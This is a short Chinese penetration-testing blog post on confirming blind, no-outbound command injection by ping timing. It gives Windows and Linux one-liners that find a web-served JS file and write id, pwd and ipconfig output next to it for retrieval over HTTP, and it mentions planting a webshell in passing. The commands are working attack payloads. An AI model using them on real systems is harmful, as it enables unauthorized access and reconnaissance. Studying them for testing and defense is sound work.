前言
本文主要讲的是无回显, 不出网命令执行测试方法, 首先通过大小写判断是 Linux 还是 win, 然后通过命令自动查找目录写文件来测试.
这里没有这种环境就拿一个 PHP 的做演示 (其实像这种可以直接写马在当前目录)
首先我们通过下面命令和响应包的时间判断存在命令执行 (适用于 win Linux 下使用 - c)
- ping -n 3 127.0.0.1
- ping -n 4 127.0.0.1
然后在网站上找一个名字比较少见特殊的 JS(如果网站有上传图片的地方可以用你上传图片的名字)
Windows 下的测试方式
执行下面命令自动查找 bsa.JS 并在其目录写入文件 (由于可能不知道是什么盘可能需要多次尝试)
cmd /c "for /f %i in ('dir /s /b e:bsa.js') do (echo %i> %i.path.txt)&(ipconfig> %i.ipconfig.txt)"
在 http://www.test.com/js/ 目录下访问 bsa.JS.ipconfig.txt bsa.JS.path.txt 查看执行 ifconfig 的结果和路径
Linux 下的测试方式
使用下面的命令, 自动查找 bas.JS 并在其目录下生成 test.txt 写入 id pwd ifconfig 命令的结果
find / -name bas.JS|while read f;do sh -c 'id;pwd;ifconfig'>$(dirname $f)/test.txt;done
参考链接: https://mp.weixin.qq.com/s/9cXGR7tlN_OAP-dMyZyHEw
来源: https://www.cnblogs.com/cwkiller/p/12726020.html